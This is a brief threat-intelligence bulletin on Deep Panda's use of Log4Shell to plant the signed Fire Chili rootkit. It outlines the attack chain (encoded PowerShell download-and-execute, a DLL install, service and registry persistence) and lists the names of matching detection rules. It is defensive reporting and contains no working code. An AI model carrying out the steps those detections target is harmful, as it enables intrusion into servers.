Deep Panda & Fire Chili Rootkits
Academic
Financial
Deep Panda & Fire Chili Rootkits
Industry: Academic, Cosmetic, Financial, Travel | Level: Tactical | Source: Fortinet
Chinese APT group, Deep Panda has been identified by researchers at FortiGuard Labs to be exploiting the Log4Shell vulnerability utilizing a new digitally signed rootkit dubbed Fire Chili. The certificates are stolen from game development companies Frostburn Studios and Korean 433CCR Company. The attack chain begins with a Log4Shell exploit on a vulnerable VMWare Horizon server that spawns an encoded PowerShell command to download and execute scripts, completing with a malicious DLL file being installed. Persistence is achieved by creating a service and registry entry. The Fire Chili rootkit has currently been scoring low based on VirusTotal review.
- Anvilogic Scenario: Deep Panda - Fire Chili Threat Campaign - Initial Attack Stage
- Anvilogic Use Cases:
- Potential CVE-2021-44228 - Log4Shell
- Encoded Powershell Command
- Executable File Written to Disk
- Download exe|msi|bat Proxy
- Executable Create Script Process
- Rare remote thread
- Windows Service Created
- Suspicious Registry Key Created